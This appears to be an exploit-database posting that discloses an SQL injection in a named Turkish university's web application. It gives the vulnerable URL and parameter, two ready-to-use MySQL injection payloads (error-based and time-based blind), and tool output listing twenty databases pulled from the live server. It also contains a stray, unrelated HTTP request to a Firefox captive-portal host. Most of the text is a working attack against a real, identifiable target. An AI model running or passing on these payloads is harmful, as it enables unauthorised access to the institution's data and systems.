afyon kocatepe üniversitesi SQL injection

2020.01.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: SQL Injection in “ https://bys.aku.edu.tr/ “ #----------------------------------------------------------------------------------------- # Exploit Author: Prototyqe/Furkan Özer #----------------------------------------------------------------------------------------- # Date: 09.01.2019 #----------------------------------------------------------------------------------------- # Category: Web Application #----------------------------------------------------------------------------------------- # Vulnerability Path: https://bys.aku.edu.tr/index.php?birim=[sql%27li] #----------------------------------------------------------------------------------------- #GET /success.txt HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: close Türü : error-based Başlık: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: birim=30 AND (SELECT 7465 FROM(SELECT COUNT(*),CONCAT(0x71717a7671,(SELECT (ELT(7465=7465,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Türü: time-based blind Başlık: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: birim=30 AND (SELECT 1518 FROM (SELECT(SLEEP(5)))WkCi) web server operating system: Linux Ubuntu web application technology: Apache 2.4.29, PHP back-end DBMS: MySQL >= 5.0 [15:27:55] [INFO] fetching database names [15:28:12] [INFO] used SQL query returns 20 entries [15:28:15] [INFO] retrieved: 'information_schema' [15:28:18] [INFO] retrieved: 'akuftp' [15:28:22] [INFO] retrieved: 'akuper' [15:28:25] [INFO] retrieved: 'bys' [15:28:28] [INFO] retrieved: 'donerser' [15:28:31] [INFO] retrieved: 'etikkurul' [15:28:35] [INFO] retrieved: 'faaliyet' [15:28:38] [INFO] retrieved: 'kirasis' [15:28:42] [INFO] retrieved: 'labcihaz' [15:28:45] [INFO] retrieved: 'merkez_switchler' [15:28:48] [INFO] retrieved: 'muh_lab' [15:28:52] [INFO] retrieved: 'mysql' [15:28:56] [INFO] retrieved: 'optik_afsu' [15:29:00] [INFO] retrieved: 'optik_sinav' [15:29:04] [INFO] retrieved: 'performance_schema' [15:29:07] [INFO] retrieved: 'phpmyadmin' [15:29:10] [INFO] retrieved: 'sys' [15:29:13] [INFO] retrieved: 'uni_net' [15:29:16] [INFO] retrieved: 'yenikirasis' [15:29:19] [INFO] retrieved: 'zimbralog' available databases [20]: [*] akuftp [*] akuper [*] bys [*] donerser [*] etikkurul [*] faaliyet [*] information_schema [*] kirasis [*] labcihaz [*] merkez_switchler [*] muh_lab [*] mysql [*] optik_afsu [*] optik_sinav [*] performance_schema [*] phpmyadmin [*] sys [*] uni_net [*] yenikirasis [*] zimbralog


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top